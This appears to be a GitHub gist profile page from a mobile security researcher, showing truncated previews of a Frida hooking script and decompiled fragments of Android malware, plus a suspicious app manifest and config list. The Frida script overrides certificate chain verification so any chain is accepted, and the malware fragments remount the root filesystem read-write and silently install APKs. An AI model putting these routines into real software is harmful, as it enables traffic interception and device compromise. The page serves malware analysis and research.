


Alejandro calleja Cortiñas alximw

  • Zimperium
  • Madrid, Spain
@alximw
alximw / property_find.js
Created May 29, 2023 14:18
Hook bionic's SystemProperty::Find(const char *property)
/* The struct prop_info * that we get back from a call to SystemProperty::Find() points into read-only
shared memory (mmapped from /dev/__properties__/u:object_r:exported_default_prop:s0), hence we can't
remap it as +rw. Instead, we create a copy using Memory.dup. With dup we copy the whole page pointed
to by the struct prop_info *, and we get a pointer to the copy. To prevent the GC from deallocating
the copy, we keep it in the cached_prop_info dictionary, where the keys are the names of the
properties and the values are the pointers to the copied pages. Every time a call to Find() is issued,
we check whether we should tamper with the property and look it up in the cache, creating the entry if
needed and returning the pointer to the copied page. If the entry does not exist, we create the copy
and overwrite the data at offset 0x4 of the copied struct prop_info with the value we want the
property to have. */
var cached_prop_info = {}
while(!Java.available);
if(Java.available) {
Java.perform(function() {
try {
var TrustManagerImpl = Java.use('com.android.org.conscrypt.TrustManagerImpl');
var array_list = Java.use("java.util.ArrayList");
TrustManagerImpl.verifyChain.implementation = function (untrustedChain, trustAnchorChain, host, clientAuth, ocspData, tlsSctData) {
return untrustedChain;
}
package safiap.framework.sdk.b;
import android.content.Context;
import android.content.SharedPreferences.Editor;
import android.net.wifi.WifiInfo;
import android.net.wifi.WifiManager;
import android.os.Build.VERSION;
import android.os.Build;
import android.telephony.TelephonyManager;
import android.text.TextUtils;
public final void remountAndKillZygote() {
StringBuilder v0 = new StringBuilder().append(this).append(Decoder.decodeBase64("b25TdGFydENvbW1hbmQ9")); // onStartCommand=
int v1 = this.counter + 1;
this.counter = v1;
v0.append(v1);
if((this.b) && (stringUtils.checkScreenIsOF(this.ctx))) {
this.b = false;
stringUtils.WriteString2File("1", new File(this.ctx.getFilesDir() + "/klzg"));
SystemUtils.remount_fileSystem("/", "rw");
new File("/sbin/.tmpkcol").delete();
int __fastcall function_d(JNIEnv *a1, jobject a2, jobject ctx, jstring encryptedFileName, jstring outFile)
{
jobject ctx_1; // r6
JNIEnv *ENV_; // r4
jclass (__cdecl *FindClass)(JNIEnv *, const char *); // r7
char *v8; // r0
char *getAssets; // r7
char *v10; // r0
int getAssetsMethodID; // r0
jclass (__cdecl *FindClass_1)(JNIEnv *, const char *); // r6
int __fastcall enablePackage(char *serviceName, int size)
{
char *serviceName_1; // r5
int v3; // r4
int result; // r0
char v5; // [sp+4h] [bp-114h]
serviceName_1 = serviceName;
v3 = size;
if ( (unsigned int)(checkSystemProperties() - 1) > 0xF )
public static String installSample(Context arg11, String sampleName, String apk_name, String arg14) {
String v2_3;
int error_code;
String v5;
int v1_1;
String v2;
String packageName;
int v0 = .lastIndexOf(Decoder.decodeBase64(".apk"));
if(v0 > 0) {
packageName = sampleName;
public static boolean remount_fileSystem(String filesystem, String mode) {
boolean v0_4;
Class v3 = SystemUtils.class;
synchronized(v3) {
StringBuilder v4 = new StringBuilder();
StringBuilder v5 = new StringBuilder();
StringBuilder v6 = new StringBuilder();
StringBuilder mode = new StringBuilder();
SystemUtils.getFSMountMode(filesystem, v4, v5, v6, mode);
if(mode.equalsIgnoreCase(mode.toString())) {
@alximw
alximw / manifest.xml
Created March 1, 2019 18:24
com.xksx.tosiok Manifest
<manifest xmlns:android="http://schemas.android.com/apk/res/android" android:versionCode="1" android:versionName="1.0" android:compileSdkVersion="28" android:compileSdkVersionCodename="9" package="com.xksx.tosiok">
<uses-sdk android:minSdkVersion="9" android:targetSdkVersion="21"/>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
<uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
[{"status":"2","name":"olo"},{"status":"1","name":"gz"},{"status":"2","name":"sz"},{"status":"1","name":"yh"},{"status":"2","name":"csj"},{"status":"2","name":"baij"},{"status":"2","name":"yk"},{"status":"1","name":"bd"},{"status":"2","name":"jqb"},{"status":"2","name":"lh"},{"status":"1","name":"hp"},{"status":"2","name":"yq"},{"status":"2","name":"sl"},{"status":"2","name":"leji2"},{"status":"2","name":"hp3"},{"status":"2","name":"uu"},{"status":"2","name":"jdzl"},{"status":"2","name":"bb"},{"status":"2","name":"sjsj"},{"status":"2","name":"cp"},{"status":"1","name":"kmd"},{"status":"1","name":"dxt"}]